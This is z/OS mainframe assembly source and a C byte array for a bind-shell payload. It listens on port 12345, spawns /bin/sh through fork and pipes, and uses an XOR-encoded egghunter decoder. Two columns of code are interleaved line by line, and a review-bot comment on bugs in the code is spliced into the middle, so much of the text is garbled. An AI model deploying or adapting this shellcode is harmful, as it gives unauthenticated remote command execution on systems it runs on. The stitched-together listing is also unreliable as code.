LHI 3,8 # used for our index L 3,1(2,11) # retrieve value at R11 +1 indexR2=0
L 4,NUMFUNC # number of functions to load CR 10,3 # compare egg with R11 mem pointer
@LDLOOP LR 0,2 # load string of func name BRC 7,LOOPER # branch anything but equal
XR 1,1 # clear R1 AR 11,4
SVC 8 # perform LOAD L 3,1(2,11) # retrieve value at R11 +1 indexR2=0
XC 0(8,2),0(2) # clear current Func space CR 10,3 # compare egg with R11 mem pointer
ST 0,0(0,2) # store addr in func space BRC 7,LOOPER # 2nd check 2 in a row good to go!
AR 2,3 # increment R2 by 8 AR 11,1 # 1 for the offset from above
AHI 4,-1 # decrement R4 SR 11,4 # 4 to skip last egg
CIB 4,0,2,@LDLOOP # compare R4 with 0,if GT loop ST 13,4(,11) # store old SP for later in wkg area
ST 11,8(,13) # store this in old wking area
*********************************************************************** LR 13,11 # set up R13 pt to new wkg area
* * ** End setup and stack management **
* Create pipes to be used to communicate with child proc * ** Begin main decoding routine **
* that will be created in upcoming forking * LR 3,11 # This is now our egghunter loc
* * AR 3,4 # add 4 to 3
*********************************************************************** AR 3,4 # R3 points to SC for decoding
@CPIPES LARL 14,@CFD LR 5,3 # R5 points to SC for jumping to
BRC 15,LPIPE # get FDs for child proc SR 3,1 # R3-1 to we can XI that addr w/o nulls
@CFD ST 5,CFDR # store child read fd SR 3,1 # R3-1 to we can XI that addr w/o nulls
ST 6,CFDW # store child write fd LR 4,1 # R4 has static 1
@CPIPE2 LARL 14,@PFD XR 1,1 # R1 will be our byte counter
BRC 15,LPIPE # get FDs for parent proc XR 2,2 # R2 will be address pointer
@PFD ST 5,PFDR # store parent read fd LOOP1 AR 1,4 # add 1 to R1 byte counter
ST 6,PFDW # store parent write fd ARK 2,3,1 # generate new address pointer
* put the XOR key (enc buffer char) from below in the quotes below
*********************************************************************** XI 1(2),X'4b' # xor byte with key
* * * put the buffer len (num of bytes) in the next cmd in CHI 1,<here>
* BP1FRK (FORK) fork a child process * CHI 1,2088 # to yield sc len
* * BRC 4,LOOP1 # loop bwd 18 bytes if R1 < size
*********************************************************************** XR 4,4
LFORK L 15,BFRK # load func addr to 15 ** Begin cleanup and stack management **
CALL (15),(CPROCN,RTN_COD,RSN_COD),VL L 13,4(4,11) # reload old SP
BRAS 0,@PREPCHL LM 6,4,12(13) # restore registers
**************************************************** BCR 15,5 # jmp to sc
* chk return code here anything but -1 is ok * ** End main decoding routine **
**************************************************** DC X'DEADBEEF' #egg
LHI 15,1 # load 1 for RC / Debugging DC X'DEADBEEF' #egg + old sp
L 6,CPROCN # locad Ret val in R6 *******************************************************************
CIB 6,-1,8,EXITP # compare R6 to -1 and jump if eq *Number of bytes: 2088
*Padding bytes: 0
**************************************************** *Enc buffer char: 0x4b
* prepare the child process for exec , only runs * *ASM buffer:
* if CPROCN (child pid from fork) equals 0 * DC X'dba79b478bbbb4b4b4b553448b0b4b4b48af1b9b0b4f539fecd34bX
**************************************************** 4aec834b4fecae48708f144b4b48bd8f244b4b48beecae48788f144bX
@PREPCHL L 2,CPROCN # load child proc # to R2 4b48b98f244b4b48ba8fb64b4b489f8b5b4b4b4b5a533a1b3c4b4b51X
CIB 2,0,7,@PREPPAR # R2 not 0? We are parent, move on 371b3b3b4b5137ee31cb4b1b3b3b4becbf4b424b4b4b4b4b4b4b4b4bX
4b4b4b4b4b4ea48f66b4b4b4b2a76c4b'
************************************************* DC X'fa4b350a6b4b428f164b4b4880532eecae49fe8f164b4b48f4532eX
* order of things to prep child pid * ecae49e40a6b4b438f164b4b48f08b2a4b4b4b4becae49ee8f164b4bX
* 0) Close parent write fd * 48fa8b2a4b4b4b4aecae49d68f164b4b48e28b2a4b4b4b49ecae49deX
* 1) Close child read fd * 0a6b4b428f164b4b48ea532eecae49c68f164b4b48d2532eecae49ccX
* 2) dupe parent read fd to std input * 8fb64b4b48348b5b4b4b4b138b3b4b4b'
* 3) dupe child write fd to std output * DC X'4b0e8f344b4b4b1951378f344b4b4b1b8b3b4b4b4b0a8f344b4b4bX
* 4) dupe child write fd to std err * 0751378f344b4b4b7551378f344b4b4b0d51378f344b4b4b7151378fX
* 5) Close parent read fd * 344b4b4b0b8b3b4b4b481a8f344b4b4b778f344b4b4b708f344b4b4bX
* 6) Close child write fd * 718f344b4b4b728f344b4b4b738b3b4b4b4b7c8f344b4b4b7f51378fX
* 7) exec /bin/sh * 344b4b4b795137ee31cb4b8f344b4b4b'
************************************************* DC X'65ec4e4b664b4b4b4b4b4c2ac9c2de2ae9c34b4b4b4b4a4b4b4b49X
LARL 14,@PRC1 4b4b4b4be9c34b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4bX
LA 2,F_CLOSFD 4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4bX
L 5,PFDW # load R5 with pfdw 4b4b4b4b4b4b4b4b4ea4ec4e49a78bab4b4b4b400a6b4b428f164b4bX
L 6,PFDW # load R5 with pfdw 4853532eecbf494feca14b5b8f164b4b'
@PRC0 BRC 15,LFCNTL # call close DC X'4845532eecbf4ab78fb64b4b49bd8b5b4b4b4b7e8b3b4b4b49a18fX
@PRC1 LARL 14,@PRC2 344b4b4b648b3b4b4b49a98f344b4b4b608b3b4b4b49918f344b4b4bX
LA 2,F_CLOSFD 6c8b3b4b4b499d8f344b4b4b688b3b4b4b4b538f344b4b4b548b3b4bX
L 5,CFDR # load R5 with cfdr 4b4b558f344b4b4b5051378f344b4b4b525137ee31cb4b8f344b4b4bX
L 6,CFDR # load R5 with cfdr 5eec4e4b5f4b4b4b4b4b4b4b4b4b4b4b'
BRC 15,LFCNTL # call close DC X'4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4ea4X
@PRC2 LARL 14,@PRC3 8fb64b4b49e48b5b4b4b4b618b3bb4b4b4ac8f344b4b4b6f8b3b4b4bX
LA 2,F_DUPFD2 # gonna do a dup2 4b548f344b4b4b6b8b3b4b4b49f88f344b4b4b578b3b4b4b4b508f34X
L 5,PFDR # parent read fd 4b4b4b5351378f344b4b4b5d5137ee31cb4b8f344b4b4b59ec4e4b5aX
LGFI 6,0 # std input 4b4b4b4b4b5b4b4b4b4b4b4b4b4b4b4b'
BRC 15,LFCNTL # call dupe2 DC X'4b4b4b4b4b4b4b4b4b4b4b4b4b4b4ea453b78f26b4b4b4b3a72c49X
@PRC3 LARL 14,@PRC4 1a4b358fb64b4b493b8b5b4b4b4b6a8b3bb4b4b4ed8f344b4b4b508bX
LA 2,F_DUPFD2 # gonna do a dup2 3b4b4b49138f344b4b4b5c8b3b4b4b4b5d8f344b4b4b5851378f344bX
L 5,CFDW # child write fd 4b4b5a5137ee31cb4b8f344b4b4b46ec4e4b474b4b4b4b4b4b4b4b4bX
LGFI 6,1 # std output 4b4b4b4b4b4b4b4b4b4b4b4ea48fb64b'
BRC 15,LFCNTL # call dupe2 DC X'4b49088b5b4b4b4b7d8b3bb4b4b43c8f344b4b4b7b8b3b4b4b4b62X
@PRC4 LARL 14,@PRC5 # if 0 we are in child pid, goto exec 8f344b4b4b678b3b4b4b4b508f344b4b4b638b3b4b4b4b548f344b4bX
LA 2,F_DUPFD2 # gonna do a dup2 4b6f8b3b4b4b4b688f344b4b4b6b5137ee31cb4b8f344b4b4b57ec4eX
L 5,CFDW # child write fd 4b504b4b4b4b4b4b4b4b4b4b5b494b4b4b4b4b4b4b4b4b4b4b4b4b4bX
LGFI 6,2 # std error 4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b'
BRC 15,LFCNTL # call dupe2 DC X'4b4b4b4b4b4b4b4b4ea48bab4b4b4b470a6b4b4f8f16b4b4b4a7ecX
@PRC5 LARL 14,@PRC6 234b4cecbf4bbaeca14b598f164b4b4ab2ec234b4decbf4ba38b1bb4X
LA 2,F_CLOSFD b4b4978b3b4b4b4b47ecae4b50ecae4a228b1b4b4b4aa5ecae4bc38bX
L 5,PFDR # load R5 with pfdr 1b4b4b4aa88b3bb4b4b4a5ecae4b47ecae4ace8babb4b4b4bd8b1bb4X
L 6,PFDR # load R5 with pfdr b4b48becbf4b3d8fb64b4b4a82537c8f'
BRC 15,LFCNTL # call close DC X'a44b4b4ae48b6b4b4b4b079c4c6b4b6b4b8b6b4b4b4b759c446b4bX
@PRC6 LARL 14,@PRC7 6b4b8f144b4b4b098b5b4b4b4b748b3b4b4b4b798f344b4b4b608b3bX
LA 2,F_CLOSFD 4b4b4b638f344b4b4b7e8b3b4b4b4ad98f344b4b4b7a8b3b4b4b4b55X
L 5,CFDW # load R5 with cfdw 8f344b4b4b668b3b4b4b4b698f344b4b4b628b3b4b4b4b638f344b4bX
L 6,CFDW # load R5 with cfdw 4b6e5137ee31cb4b8f344b4b4b6aec4e'
BRC 15,LFCNTL # call close DC X'4b6b4b4b4b4b4b4b4b4b4b4b4b4a69696969696969696969696969X
@PRC7 BRAS 0,LEXEC 6969694b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4bX
4b4b4b4b4b4b4b4ea48fa64b4b4a04533853b28f26b4b4b4a1a729abX
*********************************************************************** 4b4bb5a7233b4bb4b5ec4e4a7a8fb64b4b4a1c8fa44b4b4a778b5b4bX
* * 4b4b7a8b3bb4b4b4858f344b4b4b628b'
* BP1EXC (EXEC) execute shell '/bin/sh' * DC X'3b4b4b4b6d8f344b4b4b6c8f144b4b4b698b3b4b4b4a608f344b4bX
* * 4b6b8b3bb4b4b48a8f344b4b4b5751378f344b4b4b5151378f344b4bX
*********************************************************************** 4b535137ee31cb4b8f344b4b4b5fec4e4b584b4b4b4b4b4b4b4b4b4bX
LEXEC L 15,BEXC # load func addr to 15 4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4ea48fa6X
CALL (15),(EXCMDL,EXCMD,EXARGC,EXARGLL,EXARGL, x 4b4b4bb28f26b4b4b4bd53bda7234ba9'
EXENVC,EXENVLL,EXENVL, x DC X'b4354cb58fb64b4b4a438fa44b4b4ba08b5b4b4b4b79533a503750X
EXITRA,EXITPLA, x 3750378f144b4b4b6e8f344b4b4b638f644b4b4b6a51378f344b4b4bX
RTN_VAL,RTN_COD,RSN_COD),VL 688f244b4b4b5751378f344b4b4b5551378f344b4b4b5751378f344bX
BRAS 0,GOODEX # exit child proc after exec 4b4b515137ee31cb4b8f344b4b4b5dec4e4b5e4b4b4b4b4b4b4b4b4bX
4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b'
**************************************************** DC X'4b4b4b4b4b4b4b4b4b4b4b4b4b4ea48fa64b4b4be28f36b4b4b4bdX
* prepare the parent process to speak with child * a7334bd8b4354cb58fb64b4b4bf08fa44b4b4bd78b5b4b4b4b50533aX
* order of things to prep parent pid * 8f344b4b4b5c51378f344b4b4b5e51378f344b4b4b5851378f344b4bX
* 0) close parent fd read * 4b5a5137ee31cb4b8f344b4b4b46ec4e4b474b4b4b4b4b4b4b4b4b4bX
* 1) close child fd write * 4b4b4b4b4b4b4b4b4b4b4ea48f26b4b4'
* 2) socket,bind,accept,listen,read & write * DC X'b4b2a7234b2bb4358f16b4b4b4a48f26b4b4b4a58fa64b4b4b2c4cX
* 3) set client socked and child fd write * b58b5bb4b4b5b08f06b4b4b44b8b6b4b4b4bccecc34b5ea87b5b4b4bX
* to non_blocking * 3d8b704b4b4bb45273ec3f4b4dec234bceecbf4b45a81b6b4b4b3d8bX
**************************************************** 104b4b4bb451625122527eec3fb4bc5022092b5b4b51525002ec3fb4X
@PREPPAR LARL 14,@PRP1 a84cb58f06b4b4b5938b5bb4b4b586ec'
LA 2,F_CLOSFD DC X'c34bce8b6b4b4b4b115062a87b5b4b4b3d8b704b4b4bb45273ec3fX
L 5,PFDR # load R5 with pfdr 4b4dec734b2eecbf4b425168a87b6b4b4b3d8b704b4b4bb4097b5b4bX
L 6,PFDR # load R5 with pfdr 51525002ec3fb4af4cb55cb48b0b4b4b4b5b1bbb0b4b139b0b4fd3a7X
BRC 15,LFCNTL # call close 9b478b0b4b4b4b4c13bb0b4b4cb54b4b4b4b4b4b4b4b4b4b4b4b4b4bX
@PRP1 LARL 14,LSOCK 4b4b4b4a4b4b4b494a1878f74a1878ef'
LA 2,F_CLOSFD DC X'4a187c5b4a187d7d4a187d234a187d6f4a1878554a1878c14a1879X
L 5,CFDW # load R5 with cfdw 074a18784d4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b49497b724b4b4bX
L 6,CFDW # load R5 with cfdw 4b'
BRC 15,LFCNTL # call close
***********************************************************************
* *
* BPX1SOC set up socket - inline *
* *
***********************************************************************
LSOCK L 15,BSOC # load func addr to 15
CALL (15),(DOM,TYPE,PROTO,DIM,SRVFD, x
RTN_VAL,RTN_COD,RSN_COD),VL
*******************************
* chk return code, 0 or exit *
*******************************
LHI 15,2
L 6,RTN_VAL
CIB 6,0,7,EXITP # R6 not 0? Time to exit
***********************************************************************
* *
* BPC1BND (bind) bind to socket - inline *
* *
***********************************************************************
LBIND L 15,BBND # load func addr to 15
LA 5,SRVSKT # addr of our socket
USING SOCKADDR,5 # layout sockaddr over R5
XC SOCKADDR(16),SOCKADDR # zero sock addr struct
MVI SOCK_FAMILY,AF_INET # family inet
MVI SOCK_LEN,SOCK#LEN # len of socket
MVC SOCK_SIN_PORT,LISTSOCK # list on PORT 12345
MVC SOCK_SIN_ADDR,LISTADDR # listen on 0.0.0.0
DROP 5
CALL (15),(SRVFD,SOCKLEN,SRVSKT, x
RTN_VAL,RTN_COD,RSN_COD),VL
*******************************
* chk return code, 0 or exit *
*******************************
LHI 15,3
L 6,RTN_VAL
CIB 6,0,7,EXITP # R6 not 0? Time to exit
***********************************************************************
* *
* BPX1LSN (listen) listen on created socket - inline *
* *
***********************************************************************
LLIST L 15,BLSN # load func addr to 15
CALL (15),(SRVFD,BACKLOG, x
RTN_VAL,RTN_COD,RSN_COD),VL
*******************************
* chk return code, 0 or exit *
*******************************
LHI 15,4
L 6,RTN_VAL
CIB 6,0,7,EXITP # R6 not 0? Time to exit
***********************************************************************
* *
* BPX1ACP (accept) - accept conn from socket - inline *
* *
***********************************************************************
LACPT L 15,BACP # load func addr to 15
LA 5,CLISKT # addr of our socket address
USING SOCKADDR,5 # set up addressing for sock struct
XC SOCKADDR(8),SOCKADDR #zero sock addr struct
MVI SOCK_FAMILY,AF_INET
MVI SOCK_LEN,(SOCK#LEN+SOCK_SIN#LEN)
DROP 5
CALL (15),(SRVFD,CLILEN,CLISKT, x
CLIFD,RTN_COD,RSN_COD),VL
****************************************************
* chk return code here anything but -1 is ok *
****************************************************
LHI 15,5
L 6,CLIFD
CIB 6,-1,8,EXITP # R6 = -1? Time to exit
****************************************************
* Set clifd and child fd read to non_blocking *
****************************************************
@SNB1 LARL 14,@SNB2
LA 2,F_GETFL # get file status flags
L 5,CLIFD # client sock fd
XR 6,6 # for getfd, arg is 0
BRC 15,LFCNTL # call dupe2
@TFLAG DC F'0'
@SNB2 ST 7,@TFLAG # R7 will have our flags
LA 5,O_NONBLOCK # add non-blocking flag
OR 7,5 # or to add the flag to R7
LARL 14,@SNB3
LA 2,F_SETFL # set file status flags
L 5,CLIFD # client sock fd
LR 6,7 # put new flags in R6
BRC 15,LFCNTL # call dupe2
@SNB3 LARL 14,@SNB4
LA 2,F_GETFL # get file status flags
L 5,CFDR # child fd read
XR 6,6 # for getfd, arg is 0
BRC 15,LFCNTL # call dupe2
@SNB4 ST 7,@TFLAG # R7 will have our flags
LA 5,O_NONBLOCK # add non-blocking flag
OR 7,5 # or to add the flag to R7
LARL 14,@READCLI # when we ret, enter main loop
LA 2,F_SETFL # set file status flags
L 5,CFDR # child fd read
LR 6,7 # put new flags in R6
BRC 15,LFCNTL # call dupe2
***********************************************************************
* *
* Main read from client socket looop starts here *
* *
***********************************************************************
@READCLI L 5,CLIFD # read from CLIFD
LA 7,@READCFD # Nothing read, return to here
LARL 14,@A2E1 # Bytes read, return to here
BRC 15,LREAD # Brach to read function
*******************************
* CALL A2E *
* change CLIBUF from *
* ASCII to EBCDIC *
*******************************
@A2E1 LARL 14,@CCW1 # load return area in r14
BRC 15,CONVAE # call e2a func
@CCW1 LARL 14,@READCFD # after write, read child fd
L 5,PFDW # write to child process fd
BRC 15,LWRITE # call write function
***********************************************************************
* *
* Read from child fd loop starts here *
* *
***********************************************************************
@READCFD L 5,CFDR # read from child fd
LA 7,@READCLI # nothing read, back to socket read
LARL 14,@E2A1 # Bytes read, return to here
BRC 15,LREAD # Branch to read function
*******************************
* CALL E2A *
* change CLIBUF from *
* EBCIDIC to ASCII *
*******************************
@E2A1 LARL 14,@CCW2 # load return area in r14
BRC 15,CONVEA # call e2a func
@CCW2 LARL 14,@READCFD # loop read child proc fd after write
L 5,CLIFD # write to client socked fd
BRC 15,LWRITE # call write function
********************************************************
* Functions beyond this point, no more inline *
* execution beyond here should occur *
********************************************************
***********************************************************************
* *
* BPX1RED (read) - function *
* R5 has file descriptor to read from *
* R7 has nothing read address *
* R14 has good read return address *
* *
***********************************************************************
LREAD L 15,BRED # load func addr to 15
ST 5,@TRFD # file descriptor we are reading
ST 7,@NRA # no bytes read: return address
ST 14,SAVEAREA # bytes read: return address
XR 1,1 # clear R1
ST 1,BREAD # clear Bytes Read
L 5,CLIBUF # clibuf addr
XC 0(52,5),0(5) # 0 out cli buf
BRAS 0,@CRED # jump to call
@TRFD DC 4XL1'0' # temp var for rd to read
@NRA DC 4XL1'0' # temp var for not read ret addr
@CRED CALL (15),(@TRFD,CLIBUF,ALET,CLIREAD, x
BREAD,RTN_COD,RSN_COD),VL
****************************************************
* chk return code here anything but -1 is ok *
* for non-blocking fd's we have to check *
* both the return val and code to make sure *
* it didn't fail just b/c non-blocking and no *
* data available vs just a read error *
****************************************************
L 14,SAVEAREA # bytes read RA
L 7,@NRA # no bytes read RA
LHI 15,6 # exit code for this function
L 6,BREAD # bytes read (aka rtn val)
CIB 6,0,2,0(14) # bytes read, process them
CIB 6,0,8,0(7) # OK rtn code, on to nobyte read
L 6,RTN_COD # load up return code
LA 1,EWOULDBLOCK # load up the non-blocking RTNCOD
LA 2,EAGAIN # load up the other OK nblck RTNCOD
CRB 6,1,8,0(7) # OK rtn code, on to nobyte read
CRB 6,2,8,0(7) # OK rtn code, on to nobyte read
BRAS 0,EXITP # -1 and not due to blocking, exit
***********************************************************************
* *
* BPX1WRT (WRITE) - function *
* R5 has file descriptor to read from *
* *
***********************************************************************
LWRITE L 15,BWRT # load func addr to 15
ST 5,@TWFD # store fd in temp fd
ST 14,SAVEAREA # save return address
BRAS 0,@CWRT # jump to write
@TWFD DC A(*) # temp holder for fd
@CWRT CALL (15),(@TWFD,CLIBUF,ALET,BREAD, x
BWRIT,RTN_COD,RSN_COD),VL
**************************************************************
* chk return code here anything but neg 1 is ok *
* exit if a match (8) *
**************************************************************
L 14,SAVEAREA # restore return address
LHI 15,9 # exit code for this func
L 6,BWRIT # set r6 to rtn val
CIB 6,-1,8,EXITP # exit if R6 = -1
BCR 15,14 # back to return address
***********************************************************************
* *
* BPX1FCT (fcntl) edit file descriptor *
* for dup2 set R2=F_DUPFD2 *
* R5=fd to modify R6=fd to set R5 equal to *
* equivalent to dupe2(R5,R6) *
* for read flags, set R2=F_GETFL *
* R5=fd, R6=0, R7=rtn flags *
* for write flags, set R2=F_SETFL *
* R5=fd, R6=<new flags> R7=0 *
* for close, set R2=F_CLOSFD *
* R5=R6 = fd to close (optionally R5 & R6 can be a range *
* of FDs to close) *
* *
***********************************************************************
LFCNTL L 15,BFCT # load func addr to 15
ST 14,SAVEAREA # save return address
ST 5,@FFD # fd to be duplicated
ST 2,@ACT # action field for BPX1FCT
ST 6,@ARG # r6 should have the biggest fd
BRAS 0,@FCTL
@FFD DC F'0'
@ACT DC F'0'
@ARG DC F'0'
@RETFD DC F'0'
@FCTL CALL (15),(@FFD,@ACT,@ARG,@RETFD,RTN_COD,RSN_COD),VL
****************************************************
* chk return code here anything but -1 is ok *
****************************************************
LHI 15,11 # exit code for this func
L 7,@RETFD # set r6 to rtn val
CIB 7,-1,8,EXITP # r6 = -1 exit
L 14,SAVEAREA # reload ret address
BCR 15,14 # return to caller
***********************************************************************
* *
* BPX1PIP (pipe) create pipe - no input *
* returns: R5=read fd R6=write fd *
* *
***********************************************************************
LPIPE L 15,BPIP # load func addr to 15
ST 14,SAVEAREA # save return address
BRAS 0,@PIP
@RFD DC F'0' # read file desc
@WFD DC F'0' # write file desc
@PIP CALL (15),(@RFD,@WFD,RTN_VAL,RTN_COD,RSN_COD),VL
****************************************************
* chk return code here anything but -1 is ok *
****************************************************
LHI 15,12 # exit code for this func
L 6,BWRIT # set r6 to rtn val
CIB 6,-1,8,EXITP
L 5,@RFD # load R5 with read fd
L 6,@WFD # load R6 with write fd
L 14,SAVEAREA # reload ret address
BCR 15,14 # return to caller
***********************************************************************
* *
* CONVAE - convert CLIBUF ascii to ebcidic *
* function looks up ascii byte and returns ebcdic *
* expects return address in R14 *
* *
***********************************************************************
CONVAE LHI 6,1 # R6 has number 1
L 4,BREAD # num of bytes read
L 1,CLIBUF # address of cli sock input
LOOP1 L 2,A2E # address of a2e buff
SR 2,6 # subtract 1 from R2 addr
LB 3,0(0,1) # Load byte from cli into R3
NILF 3,X'FF' # make sure R3 is 1 positive byte
AR 2,3 # add ascii val to a2e buff
LB 3,0(0,2) # load byte from a2e buff into R3
NILF 3,X'FF' # make sure R3 is 1 positive byte
STC 3,0(0,1) # store R3 byte back into cli buff
AR 1,6 # increment client buff
SR 4,6 # sub1 from ctr, loop if non-neg
BRC 7,LOOP1 # looop
BCR 15,14 # return to caller
***********************************************************************
* *
* CONVEA - convert CLIBUF ebcidic to ascii *
* function looks up ebcidic byte and returns ascii *
* expects return address in R14 *
* *
***********************************************************************
CONVEA LHI 6,1 # R6 has number 1
L 4,BREAD # num of bytes read
L 1,CLIBUF # address of cli sock input
LOOP2 L 2,E2A # address of e2a buff
SR 2,6 # subtract 1 from R2 addr
LB 3,0(0,1) # Load byte from cli into R3
NILF 3,X'FF' # make sure R3 is 1 positive byte
AR 2,3 # add ascii val to e2a buff
LB 3,0(0,2) # load byte from e2a buff into R3
STC 3,0(0,1) # store R3 byte back into cli buff
NILF 3,X'FF' # make sure R3 is 1 positive byte
AR 1,6 # increment client buff
SR 4,6 # sub1 from ctr, loop if non-neg
BRC 7,LOOP2 # looop
BCR 15,14 # return to caller
****************************************************
* cleanup & exit *
* preload R15 with exit code *
****************************************************
GOODEX XR 15,15 # zero return code
EXITP ST 15,0(,11)
L 13,4(,11)
LM 14,12,12(13) # restore registers
LARL 5,SAVEAREA
L 15,0(0,5)
BCR 15,14 # branch to caller
**********************
**********************
* *
* Constant Sections *
* *
**********************
**********************
@CONST DS 0F # constants full word boundary
SAVEAREA DC X'00000000'
DC X'00000000'
ALET DC F'0'
O_NONBLOCK EQU X'04' # bit for nonblocking io
EWOULDBLOCK EQU X'44E' # rtncod for nonblk read sock
EAGAIN EQU X'70' # rtncod for nonblk, not thr
*************************
* Function addresses * # pipe variables
*************************
FFUNC DC A(BFRK) # address of first function
NUMFUNC DC F'11' # number of funcs listed below
BFRK DC CL8'BPX1FRK ' # Fork
BEXC DC CL8'BPX1EXC ' # Exec
BSOC DC CL8'BPX1SOC ' # Socket
BBND DC CL8'BPX1BND ' # Bind
BLSN DC CL8'BPX1LSN ' # Listen
BACP DC CL8'BPX1ACP ' # Accept
BRED DC CL8'BPX1RED ' # Read
BWRT DC CL8'BPX1WRT ' # Write
BCLO DC CL8'BPX1CLO ' # Close
BFCT DC CL8'BPX1FCT ' # Fcntl
BPIP DC CL8'BPX1PIP ' # Pipe
*************************
* Socket conn variables * # functions used by pgm
*************************
LISTSOCK DC XL2'3039' # port 12345
LISTADDR DC XL4'00000000' # address 0.0.0.0
BACKLOG DC F'1' # 1 byte backlog
DOM DC A(AF_INET) # AF_INET = 2
TYPE DC A(SOCK#_STREAM) # stream = 1
PROTO DC A(IPPROTO_IP) # ip = 0
DIM DC A(SOCK#DIM_SOCKET) # dim_sock = 1
SRVFD DC A(*) # server FD
SRVSKT DC 16XL1'77' # srv socket struct
SOCKLEN DC A(SOCK#LEN+SOCK_SIN#LEN)
CLILEN DC A(*) # len of client struct
CLISKT DC 16XL1'88' # client socket struct
CLIFD DC A(*) # client fd
************************
* BPX1PIP vars ********* # pipe variables
************************
CFDR DC F'0' # child proc FD read
CFDW DC F'0' # child proc FD write
PFDR DC F'0' # parent proc FD read
PFDW DC F'0' # parent proc FD write
************************
* BPX1FRK vars *********
************************
CPROCN DC F'-1' # child proc #
************************
* BPX1EXC vars *********
************************
EXCMD DC CL7'/bin/sh' # command to exec
EXCMDL DC A(L'EXCMD) # len of cmd to exec
EXARGC DC F'1' # num of arguments
EXARG1 DC CL2'sh' # arg 1 to exec
EXARG1L DC A(L'EXARG1) # len of arg1
EXARGL DC A(EXARG1) # addr of argument list
EXARGLL DC A(EXARG1L) # addr of arg len list
EXENVC DC F'0' # env var count
EXENVL DC F'0' # env var arg list addr
EXENVLL DC F'0' # env var arg len addr
EXITRA DC F'0' # exit routine addr
EXITPLA DC F'0' # exit rout parm list addr
**************************
* Socket read/write vars *
**************************
CLIREAD DC A(L'@CBUF) # one less than buf
CLIBUF DC A(@CBUF) # buff for read cli sock
@CBUF DC 52XL1'22'
BREAD DC F'0' # bytes read
BWRIT DC F'0' # bytes written
*********************
* Return value vars *
*********************
RTN_VAL DC A(*) # return value
RTN_COD DC A(*) # return code
RSN_COD DC A(*) # reason code
***************************
***** end of constants ****
***************************
****************************************************
* ebcidic to ascii lookup *
* read hex(ebcidic char) bytes from beginning of *
* array to get ascii byte *
****************************************************
E2ABUF DC X'0102039c09867f978d8e0b0c0d0e0f101112139d0a08871819928fX E2ABUF DC X'0102039c09867f978d8e0b0c0d0e0f101112139d0a08871819928fX
1c1d1e1f808182838485171b88898a8b8c0506079091169394959604X 1c1d1e1f808182838485171b88898a8b8c0506079091169394959604X
98999a9b14159e1a20a0e2e4e0e1e3e5e7f1a22e3c282b7c26e9eaebX 98999a9b14FF9e1a20a0e2e4e0e1e3e5e7f1a22e3c282b7c26e9eaebX
e8edeeefecdf21242a293b5e2d2fc2c4c0c1c3c5c7d1a62c255f3e3fX e8edeeefecdf21242a293b5e2d2fc2c4c0c1c3c5c7d1a62c255f3e3fX
f8c9cacbc8cdcecfcc603a2340273d22' f8c9cacbc8cdcecfcc603a2340273d22'
DC X'd8616263646566676869abbbf0fdfeb1b06a6b6c6d6e6f707172aaX DC X'd8616263646566676869abbbf0fdfeb1b06a6b6c6d6e6f707172aaX
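Review bot: the -1 check after the BPX1PIP call in LPIPE tests the wrong variable: the CALL passes RTN_VAL, but the next lines do `L 6,BWRIT` / `CIB 6,-1,8,EXITP`, and BWRIT is the bytes-written counter for LWRITE (still F'0' at that point), so a failed pipe() is never caught and the code goes on with zeroed @RFD/@WFD; it should be `L 6,RTN_VAL`. Also worth verifying: CLIREAD is `DC A(L'@CBUF)` with @CBUF defined as `DC 52XL1'22'`, and the length attribute of a DC excludes the duplication factor, so this is 1, not the "one less than buf" the comment claims (the XC in LREAD clears 52 bytes, which suggests 52 was intended). Several comments contradict the register they sit on: the `L 6,PFDR` / `L 6,CFDW` lines in the parent-prep and close sequences say "load R5", the `L 7,@RETFD` / `CIB 7,-1,8,EXITP` lines in LFCNTL say "r6", and the F_GETFL/F_SETFL calls in @SNB1..@SNB4 are commented "call dupe2"; the BACKLOG comment "1 byte backlog" should read "backlog of 1 connection". In CONVEA the `NILF 3,X'FF'` comes after the `STC`, unlike CONVAE where it precedes it; harmless, but the order should match.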
@ -587,24 +161,170 @@ E2ABUF DC X'0102039c09867f978d8e0b0c0d0e0f101112139d0a08871819928fX
4c4d4e4f505152b9fbfcf9faff5cf7535455565758595ab2d4d6d2d3X 4c4d4e4f505152b9fbfcf9faff5cf7535455565758595ab2d4d6d2d3X
d530313233343536373839b3dbdcd9da' d530313233343536373839b3dbdcd9da'
DC X'9f' DC X'9f'
E2A DC A(E2ABUF) ******************************************************************
**************************************************** DC X'8BADF00D' eof marker
* ascii to ebcidic lookup * END
* read hex(ascii char) bytes from beginning of *
* array to get ebcidic byte * ########################################################################
****************************************************
A2EBUF DC X'010203372d2e2f1605150b0c0d0e0f101112133c3d322618193f27X \* For SystemZ USS *\
1c1d1e1f405a7f7b5b6c507d4d5d5c4e6b604b61f0f1f2f3f4f5f6f7X \* Bind shell payload listens on port 12345 on 0.0.0.0 *\
f8f97a5e4c7e6e6f7cc1c2c3c4c5c6c7c8c9d1d2d3d4d5d6d7d8d9e2X \* Use netcat to connect *\
e3e4e5e6e7e8e9ade0bd5f6d79818283848586878889919293949596X \* Author: Bigendian Smalls *\
979899a2a3a4a5a6a7a8a9c04fd0a107' char sc[]=
DC X'202122232425061728292a2b2c090a1b30311a333435360838393aX "\x90\x64\xd0\x0c\xc0\xf0\xff\xff\xff\xfe\x18\xcf\x17\x11\x17\x22"
3b04143eff41aa4ab19fb26ab5bbb49a8ab0caafbc908feafabea0b6X "\x17\x33\xc2\x19\x01\x01\x01\x02\xc2\x29\x01\x01\x01\x03\x17\x12"
b39dda9b8bb7b8b9ab6465626663679e687471727378757677ac69edX "\x18\x41\x8b\x40\x10\x01\x17\xaa\x17\x22\xc0\xa1\xde\xad\xbe\xef"
eeebefecbf80fdfefbfcbaae594445424643479c4854515253585556X "\x18\xbc\x1a\xb1\x58\x32\xb0\x01\x19\xa3\xa7\x74\xff\xfc\x1a\xb4"
578c49cdcecbcfcce170dddedbdc8d8e' "\x58\x32\xb0\x01\x19\xa3\xa7\x74\xff\xf6\x1a\xb1\x1b\xb4\x50\xd0"
